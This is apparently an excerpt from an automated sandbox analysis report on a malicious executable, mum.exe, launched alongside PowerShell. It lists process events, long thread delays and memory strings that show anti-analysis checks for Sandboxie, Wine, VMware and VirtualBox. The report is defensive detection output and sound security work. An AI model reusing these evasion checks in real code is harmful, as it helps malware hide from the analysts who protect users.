          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR
          Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993717097.00000000026E4000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050874977.00000000026E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME VIDEOBIOSVERSION
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 868Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2292Thread sleep time: -45877s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2292Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1972Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 304Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1800Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2324Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 568Thread sleep time: -45877s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 568Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 508Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1980Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1580Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1748Thread sleep time: -45877s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 1748Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2356Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\mum.exe TID: 2524Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 45877Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 45877Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 45877
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\mum.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareTSOFTWARE\Oracle\VirtualBox Guest AdditionsFSELECT * FROM Win32_VideoController
          Source: mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II2VM Additions S3 Trio32/64
          Source: mum.exe, 00000008.00000002.958509160.00000000007FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware_S
